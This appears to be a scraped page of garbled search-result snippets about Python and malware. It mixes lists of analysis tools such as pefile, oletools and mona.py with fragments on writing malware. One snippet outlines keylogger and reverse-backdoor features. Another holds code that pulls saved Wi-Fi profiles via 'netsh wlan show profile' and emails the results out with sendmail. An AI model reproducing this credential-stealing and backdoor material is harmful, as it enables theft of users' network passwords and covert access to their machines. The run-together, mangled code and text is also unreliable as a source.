if __name__ =="__main__":#Identify specified folder with suspect filesdir_path= sys.argv[1]#Create a list of files with full pathfile_list = [] for folder,subfolder,files in os.walk(dir_path):for f in files: full_path = os.path.join(folder,f) file_list.append(full_path)#O...
WRITING MALWARE Download file. Execute Code. Send Report. Download & Execute. Execute & Report. Download, Execute & Report. KEYLOGGER A program thatrecords keyspressed on the keyboard. REVERSE_BACKDOOR Access file system. Execute system commands. Download files. Upload files. Persistence. PROGRAMMING...
https://blog.securitybreak.io/10-python-libraries-for-malware-analysis-and-reverse-engineering-622751e6ebd0 发布于 2023-09-19 16:14・北京 Python 入门 逆向工程 Python 赞同11添加评论 分享喜欢收藏申请转载
server.sendmail(email, email, message) server.quit() command="netsh wlan show profile"networks= subprocess.check_output(command, shell=True) network_names_list= re.findall("(?:Profile\s*:\s)(.*)", networks.decode()) result=""fornetwork_nameinnetwork_names_list: command="netsh wlan show...
mona.py: PyCommand for Immunity Debugger that replaces and improves on pvefindaddr IDAPython: IDA Pro plugin that integrates the Python programming language, allowing scripts to run in IDA Pro PyEMU: fully scriptable IA-32 emulator, useful for malware analysis pefile: read and work with Portable...
oletoolsis a package of python tools to analyzeMicrosoft OLE2 files(also called Structured Storage, Compound File Binary Format or Compound Document File Format), such as Microsoft Office documents or Outlook messages, mainly for malware analysis, forensics and debugging. It is based on theolefilepa...
oletools - python tools to analyze MS OLE2 files (Structured Storage, Compound File Binary Format) and MS Office documents, for malware analysis, forensics and debugging. - justinforbes/oletools
PyEMU: fully scriptable IA-32 emulator, useful for malware analysis pefile: read and work with Portable Executable (aka PE) files pydasm: Python interface to the libdasm x86 disassembling library PyDbgEng: Python wrapper for the Microsoft Windows Debugging Engine ...
oletools - python tools to analyze MS OLE2 files (Structured Storage, Compound File Binary Format) and MS Office documents, for malware analysis, forensics and debugging. - up777/oletools
(accesskey=accesskey,secretkey=secretkey),'Content-type':'application/json','Accept':'text/plain'}api="https://{ip}:{port}/editor/scan/templates".format(ip=ip,port=port)response=requests.get(api,headers=header,verify=False)templates=json.loads(response.text)['templates']fortemplateintemplates...